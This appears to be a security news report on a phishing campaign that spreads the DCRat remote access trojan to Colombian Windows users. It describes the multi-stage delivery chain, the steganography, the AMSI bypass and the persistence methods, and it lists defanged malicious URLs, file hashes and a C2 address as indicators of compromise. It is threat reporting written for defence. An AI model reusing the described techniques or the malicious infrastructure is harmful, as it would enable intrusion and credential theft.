A newly uncovered cyber campaign has been deploying the modular DCRat Remote Access Trojan (RAT) to target Microsoft Windows users, predominantly in Colombia, through highly convincing phishing emails.
The attack, attributed to a threat actor impersonating a Colombian government agency, leverages a blend of advanced evasion techniques including steganography, base64 encoding, and multi-stage payload delivery to stealthily compromise systems and bypass security controls.
Layered Multistage Attack Chain
The campaign begins with a seemingly official email containing a password-protected ZIP archive, designed to lure victims into executing its contents.
Inside, a batch file initiates the infection by downloading a heavily obfuscated VBS script from a paste site.
This script, after deobfuscation, executes PowerShell code that retrieves and processes an image file embedded with malicious base64 data a classic use of steganography. This image, when decoded, reveals and runs a .NET RAT executable.
Technical analysis shows that DCRat’s architecture is modular, allowing attackers to dynamically load plugins to tailor its behavior for activities such as data theft, surveillance, and persistence.
Once active, the malware provides attackers with comprehensive remote control over the infected system.
Capabilities include command execution, file and process management, screenshot capture, credential harvesting, and keylogging.
System manipulation functions further allow the RAT to reboot, shut down, and log off users or create new accounts on the system.
A key part of DCRat’s stealth is its anti-analysis features. The RAT attempts to detect virtualized environments, disables key Windows administrative tools, and uses an AMSI (Antimalware Scan Interface) bypass routine to avoid detection by endpoint security software.
Persistence is achieved through scheduled tasks or registry modifications, depending on the victim’s privilege level, ensuring the malware survives reboots and user logins.
Severe Impact
The implications of a successful DCRat infection are significant. Attackers gain persistent access to compromised Windows devices, enabling large-scale theft of sensitive data such as login credentials, documents, and browser information.
The malware can also manipulate the victim’s system environment, disrupt operations, and potentially facilitate further lateral movement within an organization’s network.
Fortinet reports that its security products including FortiMail, FortiGate, FortiClient, and FortiEDR—effectively detect and block all stages of this malware, thanks to up-to-date threat intelligence and dynamic analysis engines.
The vendor also advises organizations to leverage advanced email security, user awareness training, and reputable threat intelligence services to defend against sophisticated threats like this.
Indicators of Compromise
| Type | Indicator |
|---|---|
| URL | hxxp[:]//paste[.]ee/d/jYHEqBJ3/0 |
| URL | hxxps[:]//paste[.]ee/d/oAqRiS3g |
| URL | hxxps[:]//ia601205[.]us[.]archive[.]org/26/items/new_image_20250430/new_image[.]jpg |
| SHA-256 | db21cc64fb7a7ed9075c96600b7e7e7007a0df7cb837189c6551010a6f828590 (ZIP) |
| SHA-256 | 34b8040d3dad4bd9f34738fbc3363fcda819ac479db8497fb857865cee77ad89 (BAT) |
| SHA-256 | b0f3c7ea17875b5e1545678b3878ce268ff4bde718b66254ce01b0bb864801b8 (VBS) |
| SHA-256 | 77a22e30e4cc900379fd4b04c707d2dfd174858c8e1ee3f1cbecd4ece1fab3fe (EXE) |
| C2 | 176[.]65[.]144[.]19[:]8848 |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
